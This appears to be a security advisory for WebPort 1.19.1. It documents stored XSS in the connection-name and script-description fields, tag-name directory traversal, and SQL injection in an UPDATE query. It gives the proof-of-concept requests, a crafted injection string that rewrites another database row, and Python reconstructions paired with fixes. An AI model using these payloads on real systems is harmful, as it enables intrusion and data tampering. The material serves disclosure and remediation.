WebPort 1.19.1


Stored XSS in /access/setup?type=conn

In /access/setup?type=conn the connection name (the name parameter) is inserted into the HTML of the page without any filtering or escaping. A payload saved through /access/actionedit is therefore stored and executes every time the setup page is viewed. Request used:

http://127.0.0.1:8188/access/actionedit

type=conn&ip=localhost&name=localhost'%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&allow=1&showpageinfo=1&pin=1&print=1&autologin=


Directory traversal in the tags of the system settings

In the tags of the system settings we can create a tag file, for example tags.csv, in \WebPort\system\tags.

The tag name is used as the file name without any path check: if we set tag=../test, test.csv is created one level up, in \WebPort\system\, instead of inside the tags directory.

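To make the traversal concrete, here is an added example (not WebPort's code) that reconstructs the assumed file-name handling behind the tags feature, shows where tag=../test lands, and contrasts it with two fixes: an allow-list on the tag name and a realpath containment check. The install directory, the system\tags layout and the .csv suffix are assumptions taken from the writeup's description; nothing is written to disk.

```python
import os
import re

# Layout assumed from the writeup: <install>\WebPort\system\tags\<tag>.csv
TAGS_SUBDIR = os.path.join("system", "tags")
# The install directory need not exist; only path arithmetic is done here.
INSTALL_DIR = os.path.abspath(os.path.join(os.sep, "opt", "WebPort"))

def tags_path_unsafe(install_dir, tag):
    """Assumed reconstruction of the flaw (not WebPort's code): the tag name
    is glued onto the tags directory, so '../test' walks out of it."""
    return os.path.normpath(os.path.join(install_dir, TAGS_SUBDIR, tag + ".csv"))

def escapes_tags_dir(install_dir, tag):
    """True when the unsafe join lands outside system/tags."""
    tags_dir = os.path.normpath(os.path.join(install_dir, TAGS_SUBDIR))
    target = tags_path_unsafe(install_dir, tag)
    return os.path.commonpath([tags_dir, target]) != tags_dir

TAG_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

def is_valid_tag_name(tag):
    """Allow-list fix: a tag is a bare file stem, no separators and no dots."""
    return TAG_NAME_RE.fullmatch(tag) is not None

def tags_path_safe(install_dir, tag):
    """Defence in depth: validate the name, then resolve the final path and
    refuse anything that does not stay inside the tags directory. Because
    both sides go through realpath(), '../', absolute names and symlinked
    directories are all caught."""
    if not is_valid_tag_name(tag):
        raise ValueError(f"invalid tag name: {tag!r}")
    tags_dir = os.path.realpath(os.path.join(install_dir, TAGS_SUBDIR))
    candidate = os.path.realpath(os.path.join(tags_dir, tag + ".csv"))
    if os.path.commonpath([tags_dir, candidate]) != tags_dir:
        raise ValueError(f"tag name escapes the tags directory: {tag!r}")
    return candidate

def safe_accepts(install_dir, tag):
    """Convenience wrapper: does the hardened path builder accept this tag?"""
    try:
        tags_path_safe(install_dir, tag)
        return True
    except ValueError:
        return False

def to_posix(path):
    """Normalise separators so results read the same on Windows and POSIX."""
    return path.replace("\\", "/")

if __name__ == "__main__":
    # '..\\..\\x' only traverses on Windows; on POSIX it is one odd file name.
    for tag in ["tags", "../test", "..\\..\\x", "/etc/passwd"]:
        print(f"{tag!r:16} -> {to_posix(tags_path_unsafe(INSTALL_DIR, tag))}"
              f"  escapes={escapes_tags_dir(INSTALL_DIR, tag)}")
        try:
            print(f"{'':16}    safe: {to_posix(tags_path_safe(INSTALL_DIR, tag))}")
        except ValueError as exc:
            print(f"{'':16}    safe: rejected ({exc})")
```

The allow-list alone already stops the writeup's payload; the realpath check is kept as a second layer because it also covers a tags directory that is itself a symlink, which a name filter cannot see.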

Stored XSS in /script/listcalls

In /script/listcalls, when a new called script is created, its description is inserted into the HTML of the page without any filtering. Request used:

http://127.0.0.1:8188/script/actionedit

type=callscript&id=test&desc=test%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E


POST stored XSS and SQL injection in /log?type=error

The connection name set through /access/setup?type=conn (the name parameter, see above) is not only rendered unescaped: it is also placed into the UPDATE query that stores the connections, and that query ends up in the error log shown at /log?type=error.

If the connection name contains a double quote or a single quote, for example test" or test', the quote closes the string literal and the rest of the name becomes part of the UPDATE SQL query.

The failing query logged at /log?type=error looks like this:

UPDATE Data SET data = '{"default":{"IP":"default","Name":"default","Allow":true,"AllowPin":false,"Fullscreen":false,"ShowPageInfo":true,"Zoom":false,"Scale":false,"EmbedPdf":false,"PinSidemenu":true,"AllowScriptCall":false,"AllowPrint":true,"AutoLogin":"","AllowAccessTicket":false,"AllowAccessTicketCreation":false,"DisplayConfiguration":{}},"localhost":{"IP":"localhost","Name":"localhost'

","Allow":true,"AllowPin":false,"Fullscreen":false,"ShowPageInfo":true,"Zoom":false,"Scale":false,"EmbedPdf":false,"PinSidemenu":true,"AllowScriptCall":false,"AllowPrint":true,"AutoLogin":"","AllowAccessTicket":false,"AllowAccessTicketCreation":false,"DisplayConfiguration":{}}}' WHERE deviceguid = '59E1AAD5-8DF6-4A3A-88BD-E311A536F71B' AND key = 'Connections'

This is SQL injection in an UPDATE statement: the JSON blob holding the connection name is concatenated into the query text instead of being passed as a bound parameter.
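The following is an added example, not WebPort's code, that reproduces the logged query in an in-memory SQLite table and shows three things: the plain name works, the writeup's name localhost' breaks the query exactly as logged, and a crafted name turns the broken literal into a working injection that rewrites another row. The Data table layout (deviceguid, key, data), SQLite as the engine and the shortened set of connection fields are assumptions; the device GUID and column names are taken from the logged query. The parameterised version at the end is the fix.

```python
import json
import sqlite3

# Device GUID as it appears in the logged query in the writeup.
DEVICE_GUID = "59E1AAD5-8DF6-4A3A-88BD-E311A536F71B"

def connections_json(name):
    """Rebuild the Connections blob the way the logged query shows it: the
    connection name is both the object key and the Name field. Only three of
    the real blob's fields are kept here (assumption for brevity)."""
    default = {"IP": "default", "Name": "default", "Allow": True}
    entry = {"IP": "localhost", "Name": name, "Allow": True}
    return json.dumps({"default": default, name: entry}, separators=(",", ":"))

def update_query_unsafe(name):
    """Assumed reconstruction of the flaw (not WebPort's code): the JSON text
    is pasted into the SQL string. json.dumps never escapes a single quote,
    so a quote in the name closes the SQL literal early."""
    return (f"UPDATE Data SET data = '{connections_json(name)}' "
            f"WHERE deviceguid = '{DEVICE_GUID}' AND key = 'Connections'")

def new_db():
    """In-memory SQLite stand-in for the Data table (engine assumed; the
    writeup only shows the query text). The Settings row is the victim."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Data (deviceguid TEXT, key TEXT, data TEXT)")
    db.execute("INSERT INTO Data VALUES (?, 'Connections', '{}')", (DEVICE_GUID,))
    db.execute("INSERT INTO Data VALUES (?, 'Settings', '{\"admin\":false}')", (DEVICE_GUID,))
    db.commit()
    return db

def save_unsafe(db, name):
    """Run the concatenated query. Returns 'ok' or 'error: <message>', the
    message being what would land in the error log."""
    try:
        db.execute(update_query_unsafe(name))
        db.commit()
        return "ok"
    except sqlite3.Error as exc:
        db.rollback()
        return f"error: {exc}"

def save_safe(db, name):
    """The fix: the blob travels as a bound parameter, never as SQL text."""
    db.execute("UPDATE Data SET data = ? WHERE deviceguid = ? AND key = 'Connections'",
               (connections_json(name), DEVICE_GUID))
    db.commit()
    return "ok"

def read_row(db, key):
    row = db.execute("SELECT data FROM Data WHERE deviceguid = ? AND key = ?",
                     (DEVICE_GUID, key)).fetchone()
    return row[0]

def stored_names(db):
    """Connection names currently stored in the Connections blob."""
    return sorted(json.loads(read_row(db, "Connections")).keys())

if __name__ == "__main__":
    db = new_db()
    print("plain name        :", save_unsafe(db, "localhost"))
    print("writeup's name    :", save_unsafe(db, "localhost'"))
    # Closes the literal, adds a second assignment (SQLite keeps the
    # rightmost one), retargets the WHERE clause and comments out the rest.
    payload = "x', data='OWNED' WHERE key='Settings' --"
    print("crafted name      :", save_unsafe(db, payload),
          "-> Settings =", read_row(db, "Settings"))
    db = new_db()
    print("same, parameterised:", save_safe(db, payload),
          "-> Settings =", read_row(db, "Settings"), "names =", stored_names(db))
```

Escaping the quote inside the JSON would not be a fix either: the value is still interpreted as SQL text, and any character the escaping routine misses reopens the hole. Binding the parameter removes that interpretation entirely.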

If the connection name is set to something like localhost <img src="/" onerror="alert(1)">, that name is also inserted into the HTML of the error log page without any filter, so /log?type=error is a second stored XSS sink for the same parameter.
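All three stored XSS findings on this page (the connection name on /access/setup?type=conn, the script description on /script/listcalls and the connection name again on /log?type=error) have the same shape: a stored field is rendered into HTML as-is. The added example below, which is not WebPort's code, decodes the two request bodies from the writeup, renders the values through an assumed unescaped template, through a blocklist "fix" that only strips script tags, and through proper HTML escaping, and then uses the standard-library HTML parser to report which rendering still contains a live event handler. The td wrapper and the render functions are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Request bodies from the writeup, transcribed here as constructed test input:
# (field that carries the payload, raw application/x-www-form-urlencoded body)
BODIES = {
    "connection name": ("name",
        "type=conn&ip=localhost&name=localhost'%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E"
        "&allow=1&showpageinfo=1&pin=1&print=1&autologin="),
    "script description": ("desc",
        "type=callscript&id=test&desc=test%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E"),
}

def field(body, key):
    """Decode one form field the way the server would (+ and %XX handled)."""
    return parse_qs(body)[key][0]

def render_unsafe(value):
    """Assumed reconstruction of the flaw (not WebPort's code): the stored
    value is dropped straight into the HTML of the listing page."""
    return f"<td>{value}</td>"

def render_blocklist(value):
    """A common but wrong fix: remove <script> tags only. The writeup's
    payload uses <img onerror>, so it passes untouched."""
    cleaned = value.replace("<script", "").replace("</script>", "")
    return f"<td>{cleaned}</td>"

def render_safe(value):
    """The real fix: escape for the HTML text context. quote=True also
    neutralises ' and ", so the value is safe inside attributes too."""
    return f"<td>{html.escape(value, quote=True)}</td>"

class _HandlerFinder(HTMLParser):
    """Collects (tag, attribute) for every on* event-handler attribute."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.found.append((tag, name.lower()))

def event_handlers(fragment):
    """Return the event handlers a browser would see in the rendered fragment.
    A non-empty list means the stored value became live markup."""
    finder = _HandlerFinder()
    finder.feed(fragment)
    finder.close()
    return finder.found

if __name__ == "__main__":
    for label, (key, body) in BODIES.items():
        value = field(body, key)
        print(f"{label}: decoded value = {value!r}")
        for renderer in (render_unsafe, render_blocklist, render_safe):
            print(f"  {renderer.__name__:16} handlers={event_handlers(renderer(value))}")
```

The blocklist case is included because it is the fix most often attempted for reports like these; the parser check shows that it leaves the img/onerror payload fully intact, while context-aware escaping turns it into inert text.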
